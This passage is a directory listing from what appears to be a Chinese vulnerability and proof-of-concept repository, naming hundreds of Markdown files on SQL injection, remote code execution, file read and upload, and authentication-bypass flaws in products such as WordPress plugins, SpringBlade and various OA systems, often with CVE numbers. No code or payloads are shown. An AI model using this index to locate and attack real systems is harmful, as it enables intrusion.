└── Redis存在未授权访问导致的RCE.md
├── RedisManager
├── Redis-manager存在SpringBoot未授权漏洞.md
└── Redis-manager存在默认口令漏洞.md
├── Rejetto
└── RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md
├── RichMail企业邮箱
└── RichMail企业邮箱敏感信息泄漏漏洞.md
├── Roxy-WI
└── Roxy-WIoptions.py远程命令执行漏洞.md
├── RuoYi
├── RUOYI-v4.7.8存在远程代码执行漏洞.md
├── RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md
├── RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md
└── 若依后台定时任务存在SSRF漏洞.md
├── RuvarOA协同办公平台
└── RuvarOA协同办公平台多处存在SQL注入漏洞.md
├── SPIP
├── SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md
└── SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md
├── Salia
├── Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359).md
└── Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md
├── Secnet安网
└── Secnet安网智能AC管理系统actpt_5g信息泄露.md
├── Secnet安网智能AC管理系统
├── Secnet安网 智能AC管理系统 actpt_5g 信息泄露.md
└── Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md
├── ServiceNow UI
└── ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879).md
├── ServiceNow-UI
└── ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879).md
├── ServiceNowUI
└── ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md
├── Sharp
└── Sharp多功能打印机未授权访问漏洞.md
├── ShokoServer
├── ShokoServerwithpath存在任意文件读取漏洞.md
└── ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md
├── Sitecore
└── CVE-2024-46938.md
├── Smart S85F
└── Smart S85F 任意文件读取.md
├── Smart-S85F
└── Smart-S85F-任意文件读取.md
├── Smartbi
├── Smartbi 内置用户登陆绕过.md
├── Smartbi-内置用户登陆绕过.md
└── Smartbi修改用户密码漏洞.md
├── SolarWinds-Serv-U
└── SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
├── SolarWinds
└── SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md
├── Sonatype
└── SonatypeNexusRepository3存在目录遍历漏洞.md
├── SonicWall
└── SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md
├── SpiderFlow爬虫平台
├── SpiderFlow爬虫平台存在远程命令执行漏洞(CVE-2024-0195).md
└── SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195).md
├── Splunk Enterprise
├── Splunk-Enterprise任意文件读取漏洞.md
└── Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214).md
├── Splunk-Enterprise
├── Splunk-Enterprise任意文件读取漏洞.md
└── Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214).md
├── SplunkEnterprise
└── SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md
├── Spring
└── Spring-Framework路径遍历漏洞(CVE-2024-38816).md
├── SpringBlade
├── SpringBlade blade-log存在SQL 注入漏洞.md
├── SpringBlade export-user SQL 注入漏洞.md
├── SpringBlade-blade-log存在SQL-注入漏洞.md
├── SpringBlade-export-user-SQL-注入漏洞.md
├── SpringBladeapi-list存在SQL注入漏洞.md
├── SpringBladeblade-user-list存在SQL注入漏洞.md
├── SpringBladecode-list存在SQL注入漏洞.md
├── SpringBladedatasource-list存在敏感信息泄露.md
├── SpringBladedict-biz-list存在SQL注入漏洞.md
├── SpringBladedict-biz存在SQL注入漏洞.md
├── SpringBladeerror_list存在SQL注入漏洞.md
├── SpringBladeexport-user存在SQL注入漏洞.md
├── SpringBlademenu_list存在SQL注入漏洞.md
├── SpringBladenotice-list存在SQL注入漏洞.md
├── SpringBladeoss-list存在敏感信息泄露.md
├── SpringBladetenant-list存在SQL注入漏洞.md
├── SpringBladeuser-list存在敏感信息泄露漏洞.md
├── SpringBladeusual-list存在SQL注入漏洞.md
├── SpringBlade存在硬编码密钥漏洞.md
├── SpringBlade框架dict-biz接口存在sql注入漏洞.md
├── SpringBlade系统menu接口存在SQL注入漏洞.md
├── SpringBlade系统usual接口存在SQL注入漏洞.md
└── Springblade默认密钥可伪造凭据.md
├── SpringBoot
└── SpringBootjolokiaRealmJNDI远程代码执行漏洞.md
├── SpringDataMongoDB
├── SpringDataMongoDBSpEL表达式注入漏洞.md
└── Springbootgateway存在命令执行漏洞.md
├── SpringEureka
└── SpringEureka存在actuator未授权漏洞.md
├── SuiteCRM
├── SuiteCRMresponseEntryPoint存在SQL注入漏洞.md
└── SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md
├── Supabase
└── Supabasequery存在SQL注入漏洞.md
├── Supermap iServer
└── Supermap iServer任意文件读取漏洞.md
├── Symfony
└── Symfony-app_dev.php信息泄露漏洞.md
├── SysAid
├── SysAid远程命令执行漏洞(CVE-2023-47246).md
└── SysAid远程命令执行漏洞(CVE-2023-47246).md
├── TBK
└── TBKDVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721).md
├── TOTOLINK
└── TOTOLINK存在泄漏账号密码泄露漏洞.md
├── TVT数码科技
└── TVT数码科技NVMS-1000路径遍历漏洞(CVE-2019-20085).md
├── TamronOS
└── TamronOSIPTV系统ping存在命令执行漏洞.md
├── Teleport堡垒机
├── Teleport堡垒机do-login任意用户登录漏洞.md
└── Teleport堡垒机get-file后台任意文件读取漏洞.md
├── Telesquare
├── TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md
└── TelesquareTLR-2005Ksh路由器getUsernamePassword信息泄露漏洞.md
├── Tenda
├── Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md
├── Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md
├── Tenda路由器DownloadCfg信息泄露漏洞.md
├── Tenda路由器账号密码泄露.md
└── tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697).md
├── TerraMasterTOS
└── TerraMasterTOSexportUser.php远程命令执行.md
├── Tosei
└── Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md
├── Traggo
└── TraggoServer任意文件读取漏洞(CVE-2023-34843).md
├── TurboMail邮件
└── TurboMail邮件系统viewfile文件读取漏洞.md
├── Typora
├── 基于Typora DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md
└── 基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md
├── Ueditor
├── ueditor存在SSRF漏洞.md
├── ueditor存在XSS漏洞.md
└── ueditor存在任意文件上传漏洞(ASP).md
├── VEXUS多语言货币交易所
└── VEXUS多语言货币交易所存在未授权访问漏洞.md
├── VICIdial
└── VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md
├── Vben-Admin
└── Vben-Admin存在硬编码漏洞.md
├── Viessmann
└── ViessmannVitogateRCE漏洞(CVE-2023-45852).md
├── Vite开发服务器
└── Vite开发服务器任意文件读取漏洞(CVE-2025-30208).md
├── VvvebJs
└── VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md
├── WAGO
└── WAGO系统远程代码执行漏洞(CVE-2023-1698).md
├── WEBMAIL
└── WEBMAIL存在任意用户登录漏洞.md
├── WIFISKY
├── WIFISKY7层流控路由器confirm存在命令执行漏洞.md
├── WIFISKY7层流控路由器index存在命令执行漏洞.md
├── WIFISKY7层流控路由器jumper存在命令执行漏洞.md
├── WIFISKY7层流控路由器存在后台命令执行漏洞.md
└── WIFISKY7层流控路由器存在弱口令漏洞.md
├── WNJsoft
└── W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞.md
├── WVP视频平台
└── WVP视频平台(国标28181)未授权SQL注入漏洞.md
├── Wavlink
├── WAVLINKadm.cgi命令执行漏洞.md
├── WAVLINKlive_api.cgi存在命令执行.md
├── WAVLINKmesh.cgi命令执行漏洞(CVE-2022-2486).md
└── WAVLINKnightled.cgi命令执行漏洞(CVE-2022-2487).md
├── WeGIA
└── WeGIA存在前台任意文件上传漏洞.md
├── Weblogic
├── WebLogic远程代码执行漏洞(CVE-2024-21006).md
└── Weblogic远程代码执行(CVE-2024-20931).md
├── WeiPHP
├── WeiPHP存在SQL注入漏洞.md
└── WeiPHP微信开发框架Notice_index接口处存在远程代码执行漏洞.md
├── Wgcloud
└── wgcloud存在弱口令漏洞.md
├── WinRAR
├── WinRAR CVE-2023-38831.md
└── WinRAR-CVE-2023-38831.md
├── WookTeam
└── WookTeamsearchinfo存在SQL注入漏洞.md
├── WookTeam轻量级的团队在线协作系统
└── WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md
├── WordPress
├── WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md
├── WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954).md
├── WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
├── WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md
├── WordPress RomethemeKit Plugin存在RCE漏洞(CVE-2025-30911).md
├── WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md
├── WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md
├── WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956).md
├── WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495).md
├── WordPress-MasterStudy-LMS插件存在SQL注入漏洞(CVE-2024-1512).md
├── WordPress-WebDirectory插件存在sql注入(CVE-2024-3552).md
├── WordPress-js-support-ticket存在文件上传漏洞.md
├── WordPress-thimpress_hotel_booking存在代码执行漏洞.md
├── WordPress_LayerSlider插件SQL注入漏洞(CVE-2024-2879).md
├── WordPress_Wholesale_Market插件存在任意文件读取漏洞.md
├── WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md
├── WordPress插件Bricks-Builder存在RCE漏洞(CVE-2024-25600).md
├── WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989).md
├── WordPress插件Dokan-Pro存在SQL注入漏洞.md
├── WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935).md
├── WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md
├── WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md
├── WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234).md
├── WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295).md
├── WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md
├── WordPress插件Recall存在SQL注入漏洞(CVE-2024-32709).md
├── WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135).md
├── WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md
├── WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849).md
├── WordPress插件Wux-Blog-Editor存在越权漏洞(CVE-2024-9932).md
├── WordPress插件query-console存在未授权RCE漏洞.md
├── WordPress插件radio存在SSRF漏洞(CVE-2024-54385).md
├── WordPress插件rtw_pdf_file任意文件读取漏洞.md
├── WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443).md
├── WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md
├── WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522).md
├── Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553).md
├── Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md
├── wordpress listingo 文件上传漏洞.md
└── wordpress-listingo-文件上传漏洞.md
├── X2Modbus
└── X2Modbus网关GetUser接口存在信息泄漏漏洞.md
├── XETUX
└── XETUX软件dynamiccontent.properties.xhtml远程代码执行漏洞.md
├── XWiki
├── XWiki-Platform远程代码执行漏洞.md
└── XWikiDatabaseSearch存在远程命令执行漏洞(CVE-2024-31982).md
├── XXL-JOB
├── XXL-JOB默认accessToken权限绕过漏洞.md
└── XXL-JOB默认accessToken身份绕过漏洞.md
├── Yapi
└── Yapi存在远程命令执行漏洞.md
├── Yearning
├── Yearning_front任意文件读取.md
└── Yearningfront接口存在任意文件读取漏洞.md
├── YourPHP
├── YourPHPCMSRegister_checkEmail存在sql注入漏洞.md
└── YourPHPCMSlogin_checkEmail存在sql注入漏洞.md
├── YourPHPCMS
├── YourPHPCMS系统Register_checkEmail存在sql注入漏洞.md
└── YourPHPCMS系统login_checkEmail存在sql注入漏洞.md
├── YzmCMS
└── YzmCMS接口存在pay_callback远程命令执行.md
├── ZKBioSecurity
└── ZKBioSecurity存在shiro反序列漏洞.md
├── Zabbix
├── Zabbix-Serve-SQL注入漏洞(CVE-2024-22120).md
└── Zabbix存在SQL注入漏洞(CVE-2024-42327).md
├── ZenML
└── ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
├── ZeroShell
└── ZeroShell3.9.0远程命令执行漏洞(CVE-2019-12725).md
├── Zimbra
└── CVE-2024-45519.md
├── Zkteco百傲瑞达安防管理系统平台
└── Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞.md
├── ZoneMinder
├── ZoneMinderindex存在SQL注入漏洞.md
└── ZoneMinder系统sort接口存在SQL注入漏洞.md
├── Zyxe NAS
└── Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md
├── Zyxe-NAS
└── Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md
├── Zyxel(合勤)
└── ZyxelNBG2105身份验证绕过.md
├── aiohttp
└── aiohttp存在目录遍历漏洞(CVE-2024-23334).md
├── cockpit
└── cockpit系统upload接口存在文件上传漏洞.md
├── cups-browsed
└── CVE-2024-47177.md
├── cyberpanel
├── CyberPanel需授权命令注入漏洞(CVE-2024-53376).md
└── cyberpanel未授权远程命令执行漏洞.md
├── dede
├── DeDecms接口sys_verifies.php存在任意文件读取漏洞.md
├── DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md
├── DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md
├── Dedecms v5.7.111前台tags.php SQL注入漏洞.md
└── Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md
├── fogproject
└── fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914).md
├── hadoop
└── Hadoop存在未授权访问导致的RCE.md
├── hi-bridge
└── hi-bridge网关download存在文件读取漏洞.md
├── iDocView
├── I Doc View任意文件上传漏洞.md
├── I-Doc-View任意文件上传漏洞.md
├── IDocView_qJvqhFt接口任意文件读取.md
├── iDocView upload接口任意文件读取.md
└── iDocView-upload接口任意文件读取.md
├── iKuai
└── iKuai流控路由SQL注入漏洞.md
├── im即时通讯系统
└── im即时通讯系统preview.php前台任意⽂件上传漏洞.md
├── jshERP
└── jshERP信息泄露漏洞.md
├── kkFileView
└── kkFileView-v4.3.0-RCE.md
├── laravel
└── laravel开启debug模式信息泄露漏洞.md
├── linglong
└── linglong扫描系统存在JWT密钥硬编码登录绕过漏洞.md
├── maxViewStorageManager
└── maxViewStorageManager系统dynamiccontent.properties.xhtml远程代码执行漏洞.md
├── mysql2
└── mysql2原型污染漏洞(CVE-2024-21512).md
├── nps
└── npsauth_key未授权访问漏洞.md
├── omfyUI
├── omfyUI follow_symlinks文件读取漏洞.md
└── omfyUI-follow_symlinks文件读取漏洞.md
├── pearProjectApi
├── pearProjectApi系统接口organizationCode存在SQL注入漏洞.md
└── pearProjectApi系统接口projectCode存在SQL注入漏洞.md
├── pgAdmin
├── CVE-2024-2044.md
└── CVE-2024-9014.md
├── php
├── PHP-8.1.0-devzerodium后门命令执行漏洞.md
├── PHP-CGI-Windows平台远程代码执行漏洞(CVE-2024-4577).md
└── PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md
├── pyLoad
└── pyLoad远程代码执行漏洞.md
├── showdoc
├── ShowDoc3.2.5存在SQL注入漏洞.md
├── ShowDocPageController存在任意文件上传漏洞.md
├── showDoc-uploadImg任意文件上传漏洞.md
└── showdoc3.2.4-phar反序列漏洞复现.md
├── smanga
├── Smangaget-file-flow存在任意文件读取漏洞.md
├── SmangamediaId存在SQL注入漏洞.md
├── Smanga未授权远程代码执行漏洞(CVE-2023-36076).md
└── smanga存在未授权远程代码执行漏洞.md
├── thinkphp
└── thinkphp最新CVE-2024-44902反序列化漏洞.md
├── unitalk
├── unitalk存在任意用户删除漏洞.md
├── unitalk存在任意用户密码修改漏洞.md
├── unitalk存在任意用户添加漏洞.md
├── unitalk存在敏感信息泄露漏洞.md
└── unitalk存在默认弱口令漏洞.md
├── wayber
└── Elber-Wayber模拟数字音频密码重置漏洞.md
├── zzcms
├── zzcms系统接口ad_list.php存在SQL注入漏洞.md
└── zzcms系统接口index.php存在SQL注入漏洞.md
├── 万户OA
├── 万户 ezOFFICE DocumentEdit.jsp SQL注入.md
├── 万户 ezOFFICE DocumentHistory.jsp SQL注入.md
├── 万户 ezOFFICE selectAmountField.jsp SQL注入.md
├── 万户-ezOFFICE-DocumentEdit.jsp-SQL注入.md
├── 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md
├── 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞.md
├── 万户OA text2Html接口存在任意文件读取漏洞.md
├── 万户OA-RhinoScriptEngineService命令执行漏洞.md
├── 万户OA-fileUpload.controller任意文件上传漏洞.md
├── 万户OA-text2Html接口存在任意文件读取漏洞.md
├── 万户OA-upload任意文件上传漏洞.md
├── 万户OA系统接口GeneralWeb存在XXE漏洞.md
├── 万户ezEIP-success.aspx存在反序列化漏洞.md
├── 万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞.md
├── 万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞.md
├── 万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞.md
├── 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md
├── 万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md
├── 万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞.md
├── 万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞.md
├── 万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md
├── 万户ezoffice wpsservlet任意文件上传漏洞.md
├── 万户ezoffice-wpsservlet任意文件上传漏洞.md
├── 万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞.md
├── 万户协同办公平台存在未授权访问漏洞.md
└── 万户协同办公平台接口存在文件上传漏洞.md
├── 万江港利山洪灾害预警系统
└── 万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞.md
├── 万能门店小程序
├── 万能门店小程序doPageGetFormList存在sql注入漏洞.md
├── 万能门店小程序管理系统onepic_uploade任意文件上传漏洞.md
├── 微信万能门店小程序系统_requestPost存在任意文件读取漏洞.md
├── 微信万能门店小程序系统存在SQL注入漏洞.md
└── 微信万能门店小程序系统存在任意文件读取漏洞.md
├── 万豪娱乐
└── 万豪娱乐存在任意文件读取漏洞.md
├── 三星
├── 三星路由器WLANAP任意文件读取漏洞.md
└── 三星路由器WLANAP远程命令执行漏洞.md
├── 三汇网关管理软件
├── 三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞.md
└── 三汇网关管理软件debug.php远程命令执行漏洞.md
├── 上海商创
├── 大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md
└── 大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md
├── 上海汉塔
└── 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md
├── 上海汉塔网络科技有限公司
└── 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md
├── 上海爱数信息
└── 爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md
├── 上海甄云
└── 甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301).md
├── 上海迅饶自动化科技有限公司
├── 上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露.md
├── 上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露.md
├── 上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞.md
├── 上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞.md
└── 上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞.md
├── 上海鸽蛋网络
└── Teaching在线教学平台getDictItemsByTable存在sql注入漏洞.md
├── 上讯信息技术股份有限公司
└── 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞.md
├── 世纪信通管理系统
└── 世纪信通管理系统DownLoadFiles.ashx存在任意文件读取.md
├── 世邦通信
├── 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md
├── 世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞.md
├── 世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞.md
└── 世邦通信SPON-IP网络对讲广播系统videobacktrackpush.php任意文件上传漏洞.md
├── 东华医疗协同办公系统
├── 东华医疗协同办公系统connector接口处存在任意文件上传漏洞.md
├── 东华医疗协同办公系统templateFile存在任意文件下载漏洞.md
├── 东华医疗协同办公系统反序列化漏洞.md
└── 东华医疗协同办公系统文件上传.md
├── 东方通
├── 东方通TongWeb-selectApp.jsp存在任意文件上传.md
└── 东方通upload接口存在任意文件上传漏洞.md
├── 东胜物流软件
├── 东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞.md
├── 东胜物流软件CertUpload文件上传漏洞.md
├── 东胜物流软件GetDataListCA存在SQL注入漏洞.md
├── 东胜物流软件GetDataList存在SQL注入漏洞.md
├── 东胜物流软件GetProParentModuTreeList存在SQL注入漏洞.md
├── 东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md
└── 东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞.md
├── 中兴
├── 中兴H108NS路由器存在任意密码修改漏洞.md
├── 中兴H108NS路由器存在弱口令漏洞.md
└── 中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md
├── 中国移动
├── 禹路由
│ └── 中国移动禹路由ExportSettings.sh存在信息泄露漏洞.md
└── 移动云控制台
│ └── 中国移动云控制台preview存在任意文件读取.md
├── 中成科信票务管理系统
├── 中成科信票务管理平台任意文件上传漏洞.md
├── 中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞.md
├── 中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入.md
├── 中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞.md
├── 中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞.md
└── 中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md
├── 中新
└── 中新金盾信息安全管理系统存在默认管理员密码漏洞.md
├── 中科智远科技综合监管云平台
└── 中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞.md
├── 中科网威
├── 中科网威下一代防火墙控制系统download存在任意文件读取漏洞.md
└── 中科网威下一代防火墙控制系统存在账号密码泄露漏洞.md
├── 中科网威科技
└── 中科网威anysec安全网关arping存在后台远程命令执行漏洞.md
├── 中远麒麟
├── 中远麒麟堡垒机admin_commonuserSQL注入漏洞.md
└── 中远麒麟堡垒机tokensSQL注入漏洞.md
├── 中远麒麟堡垒机
└── 中远麒麟堡垒机SQL注入.md
├── 乐享智能运维管理平台
└── 乐享智能运维管理平台getToken存在SQL注入漏洞.md
├── 九块九付费进群系统
└── 九块九付费进群系统wxselect存在SQL注入漏洞.md
├── 九垠科技
└── 九垠赢商业管理系统Common.ashx存在文件上传漏洞.md
├── 九思OA
├── 九思OA接口WebServiceProxy存在XXE漏洞.md
├── 九思OA接口dl.jsp任意文件读取漏洞.md
├── 九思OA系统upload_l.jsp存在任意文件上传漏洞.md
└── 九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入.md
├── 云匣子堡垒机
├── 云匣子堡垒机fastjson漏洞.md
└── 云匣子系统接口ssoToolReport存在远程代码执行漏洞.md
├── 云安宝
└── 云安宝-云匣子config存在fastjson远程代码执行漏洞.md
├── 云时空
├── 云时空社会化商业ERP任意文件上传.md
├── 云时空社会化商业ERP系统online存在身份认证绕过漏洞.md
├── 云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞.md
├── 时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞.md
└── 时空智友企业流程化管控系统formservice存在SQL注入漏洞.md
├── 云时空社会化商业ERP系统
└── 云时空社会化商业ERP系统gpy任意文件上传漏洞.md
├── 云网OA
└── 云网OA8.6存在fastjson反序列化漏洞.md
├── 云课网校系统
└── 云课网校系统文件上传漏洞(DVB-2024-6594).md
├── 云连POS-ERP管理系统
├── 云连POS-ERP管理系统ZksrService存在SQL注入漏洞.md
└── 云连POS-ERP管理系统downloadFile存在任意文件读取漏洞.md
├── 互慧软件
└── 急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md
├── 交易所系统
└── 仿新浪外汇余额宝时间交易所任意文件读取.md
├── 亿华人力资源管理系统
├── 亿华人力资源管理系统filemanage存在任意文件上传漏洞.md
├── 亿华人力资源管理系统filemanage存在目录遍历漏洞.md
├── 亿华人力资源管理系统unloadfile存在任意文件上传漏洞.md
└── 亿华人力资源管理系统upfile存在任意文件上传漏洞.md
├── 亿渡留言管理系统
└── 亿渡留言管理系统uploadimg存在任意文件上传漏洞.md
├── 亿赛通
├── 亿赛通电子文档安全管理系统新版
│ ├── 亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md
│ └── 亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞.md
└── 亿赛通电子文档安全管理系统旧版
│ ├── 亿赛通电子文档安全管理系统AutoSignService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统ClientAjax任意文件下载.md
│ ├── 亿赛通电子文档安全管理系统CreateDocService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统DecryPermissApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统DecryptApplicationService2接口任意文件上传.md
│ ├── 亿赛通电子文档安全管理系统DecryptionApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞.md
│ ├── 亿赛通电子文档安全管理系统EmailAuditService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统FileAuditService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md
│ ├── 亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统GetValidateServerService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞.md
│ ├── 亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞.md
│ ├── 亿赛通电子文档安全管理系统MailApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统MailMessageLogServices存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞.md
│ ├── 亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞.md
│ ├── 亿赛通电子文档安全管理系统PrintAuditService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统PrintLimitApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞.md
│ ├── 亿赛通电子文档安全管理系统SecureUsbConnection存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统SystemService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统UpdateClientStatus存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统UpdatePasswordService存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统UpgradeService1存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统UpgradeService2存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞.md
│ ├── 亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞.md
│ ├── 亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞.md
│ ├── 亿赛通电子文档安全管理系统UserLoginOutService1存在xstream反序列化漏洞.md
